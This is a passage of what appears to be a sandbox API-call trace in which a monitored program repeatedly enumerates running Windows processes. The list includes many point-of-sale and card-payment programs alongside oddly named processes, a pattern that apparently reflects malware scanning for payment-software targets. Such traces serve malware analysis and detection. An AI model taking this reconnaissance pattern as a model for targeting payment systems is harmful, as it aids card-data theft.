hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0165.451] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0165.453] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0165.455] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0165.457] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0165.459] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0165.468] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0165.470] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0165.472] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0165.474] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0165.476] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0165.478] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0165.480] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0165.482] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0165.488] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0165.489] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0165.491] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0165.493] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0165.495] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0165.497] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0165.500] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0165.502] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0165.510] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0165.512] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0165.514] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0165.516] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0165.518] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0165.521] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0165.523] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0165.525] Process32Next (in: hSnapshot=0x1c64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0165.529] CloseHandle (hObject=0x1c64) returned 1 [0165.529] Sleep (dwMilliseconds=0x64) [0165.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d74 [0165.676] Process32First (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.678] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0165.680] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0165.682] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.684] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0165.686] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0165.688] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0165.690] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0165.693] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0165.695] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.771] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.773] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0165.775] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.777] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.780] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.782] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.785] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.791] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.794] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.797] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0165.800] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0165.802] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.805] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0165.807] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.846] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0165.848] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0165.855] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0165.858] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0165.860] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0165.862] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0165.864] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.867] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.870] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0165.872] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0165.874] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0165.876] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.878] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0165.880] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0165.882] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0165.883] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0165.889] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0165.891] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0165.893] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0165.894] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0165.896] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0165.898] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0165.900] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0165.902] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0165.904] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0165.906] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0165.909] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0165.911] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0165.914] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0165.916] Process32Next (in: hSnapshot=0x1d74, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0165.918] 